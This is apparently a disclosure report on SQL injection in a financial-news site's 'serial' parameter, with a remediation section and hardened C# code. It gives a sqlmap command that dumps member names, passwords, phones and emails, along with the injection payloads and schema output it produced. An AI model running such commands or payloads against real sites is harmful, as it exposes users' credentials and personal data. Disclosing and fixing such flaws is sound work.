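2015-12-01: Details reported to the vendor; awaiting vendor handling
2015-12-02: Vendor confirmed; details disclosed to the vendor only
2015-12-12: Details disclosed to core white hats and experts in related fields
2015-12-22: Details disclosed to regular white hats
2016-01-01: Details disclosed to intern white hats
2016-01-16: Details disclosed to the public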
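The global economy and trade change in an instant, and the arrival of the Internet era has thoroughly changed the ecology of information transmission and media. To stand out in 21st-century international competition and create a business advantage, one needs first-hand, real-time financial intelligence.
URL: http://**.**.**.**/newsContent.aspx?serial=6760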
$ python sqlmap.py -u "http://**.**.**.**/newsContent.aspx?serial=6760" -p serial --technique=BEQ --random-agent --batch -D w02040 -T dbo.Members -C name,password,phone,id,email --dump --start 1 --stop 10
Database: w02040
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| dbo.Members | 4853    |
+-------------+---------+
current user: 'w02040'
current user is DBA: False
database management system users [6]:
[*] BUILTIN\Administrators
[*] CSTV\Administrator
[*] sa
[*] TB
[*] TB_w
[*] w02040

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: serial (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: serial=6760 AND 2345=2345

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: serial=6760 AND 7267=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7267=7267) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(113)))

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: serial=(SELECT CHAR(113)+CHAR(120)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (9243=9243) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2000

Database: w02040
Table: Video_hit_tbl
[5 columns]
+---------------+---------------+
| Column        | Type          |
+---------------+---------------+
| hit           | int           |
| lastUpdated   | smalldatetime |
| postdate      | char          |
| source        | smallint      |
| videoFileName | char          |
+---------------+---------------+

Database: w02040
Table: Members
[14 columns]
+------------------+----------+
| Column           | Type     |
+------------------+----------+
| addr             | char     |
| birthday         | datetime |
| cellphone        | char     |
| createDate       | datetime |
| email            | char     |
| id               | char     |
| name             | char     |
| password         | char     |
| phone            | char     |
| sex              | bit      |
| vip              | char     |
| vipBlackListDate | datetime |
| vipPoint         | int      |
| vipValidDate     | datetime |
+------------------+----------+
Deploy a WAF.
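The root-cause fix for the injectable `serial` parameter is to accept only an integer and bind it as a typed query parameter, so payloads such as `6760 AND 2345=2345` never reach the SQL text. This is an added example, not code from the affected site: the `NewsRepository` class, the `dbo.News` table, its `title` and `body` columns, and the connection string are all hypothetical.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Globalization;

public static class NewsRepository
{
    // Hypothetical vulnerable form (string concatenation), shown for contrast only:
    //   "SELECT title, body FROM dbo.News WHERE serial = " + Request.QueryString["serial"]
    // Hardened form: the value is bound as @serial and never becomes part of the SQL text.
    // Table and column names are assumptions; the page does not show the real query.
    private const string Query =
        "SELECT title, body FROM dbo.News WHERE serial = @serial";

    // Accept only 1 to 9 ASCII digits. The three payloads sqlmap reports for this
    // parameter all contain spaces, parentheses or letters, so they are rejected here.
    public static bool TryParseSerial(string raw, out int serial)
    {
        serial = 0;
        if (string.IsNullOrEmpty(raw) || raw.Length > 9) return false;
        foreach (char c in raw)
        {
            if (c < '0' || c > '9') return false;
        }
        serial = int.Parse(raw, CultureInfo.InvariantCulture);
        return serial > 0;
    }

    public static DataTable GetNews(string connectionString, string rawSerial)
    {
        int serial;
        if (!TryParseSerial(rawSerial, out serial))
            throw new ArgumentException("serial must be a positive integer");

        using (SqlConnection conn = new SqlConnection(connectionString))
        using (SqlCommand cmd = new SqlCommand(Query, conn))
        using (SqlDataAdapter adapter = new SqlDataAdapter(cmd))
        {
            // Typed parameter: SQL Server receives an INT value, not query text.
            cmd.Parameters.Add("@serial", SqlDbType.Int).Value = serial;
            DataTable result = new DataTable();
            adapter.Fill(result); // Fill opens and closes the connection itself
            return result;
        }
    }
}
```

The page handler would call `NewsRepository.GetNews(connectionString, Request.QueryString["serial"])` and return a generic error page on `ArgumentException`, which also stops database error text from reaching the client.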
Severity: High
Vulnerability Rank: 16
Confirmed at: 2015-12-02 15:59
Thank you for the report.
None yet